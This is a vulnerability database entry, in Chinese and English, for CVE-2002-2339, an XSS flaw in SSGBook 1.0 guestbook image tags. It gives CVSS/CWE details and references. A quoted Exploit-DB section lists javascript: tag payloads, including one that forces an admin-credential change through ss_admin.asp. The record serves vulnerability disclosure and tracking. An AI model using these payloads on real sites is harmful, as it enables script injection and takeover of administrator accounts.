CVE-2002-2339
CVSS4.3
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:32:58
NMCOE    

[原文]Cross-site scripting (XSS) vulnerability in configure.asp in Script-Shed GuestBook 1.0 allows remote attackers to inject arbitrary web script or HTML via a javascript: URL in (1) image, (2) img, (3) image=right, (4) img=right, (5) image=left, and (6) img=left tags.


[CNNVD]SSGBook图像标签HTML注入漏洞(CNNVD-200212-752)

        Script-Shed GuestBook 1.0 版本中的configure.asp存在跨站脚本(XSS)漏洞。远程攻击者可以通过(1) image, (2) img, (3) image=right, (4) img=right, (5) image=left, and (6) img=left 标签中的javascript: URL注入任意web脚本或HTML。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-79 [在Web页面生成时对输入的转义处理不恰当(跨站脚本)]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2339
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2339
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-752
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5915
(PATCH)  BID  5915
http://www.iss.net/security_center/static/10331.php
(UNKNOWN)  XF  ss-guestbook-img-xss(10331)
http://online.securityfocus.com/archive/1/294299
(UNKNOWN)  BUGTRAQ  20021008 SSGbook (ASP)
http://archives.neohapsis.com/archives/bugtraq/2003-10/0009.html
(UNKNOWN)  BUGTRAQ  20031001 Re: SSGbook (ASP)

- 漏洞信息

SSGBook图像标签HTML注入漏洞
中危 跨站脚本
2002-12-31 00:00:00 2002-12-31 00:00:00
远程  
        Script-Shed GuestBook 1.0 版本中的configure.asp存在跨站脚本(XSS)漏洞。远程攻击者可以通过(1) image, (2) img, (3) image=right, (4) img=right, (5) image=left, and (6) img=left 标签中的javascript: URL注入任意web脚本或HTML。

- 公告与补丁

        It has been reported that the vendor has addressed this issue. An upgrade is linked below:
        Script-Shed SSGbook 1.0
        

- 漏洞信息 (21914)

SSGBook 1.0 Image Tag HTML Injection Vulnerabilities (EDBID:21914)
asp webapps
2002-10-08 Verified
0 frog
N/A [点击下载]
source: http://www.securityfocus.com/bid/5915/info

SSGbook includes codes for allowing users to specify HTML formatting and layout inside of guestbook entries. For example, a user can include an image by including it inside of [image] or [img] tags. However, arbitrary HTML and script code are not sufficiently sanitized within these tags.

As a result, users may include malicious HTML and script code inside of guestbook entries. The attacker-supplied code will be rendered in the web client of a user who views a malicious guestbook entry. 

[image]javascript:{SCRIPT}[/image]

[img=right]javascript:{SCRIPT}[/img=right]

[image=right]javascript:{SCRIPT}[/image=right]

[img=left]javascript:{SCRIPT}[/img=left]

[image=left]javascript:{SCRIPT}[/image=left]

[img]javascript:{SCRIPT}[/img]

[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]


		

- 漏洞信息

59024
Script-Shed GuestBook config.asp Multiple Tag Handling XSS
Remote / Network Access Infrastructure, Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2002-10-08 Unknow
Unknow 2003-10-01

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站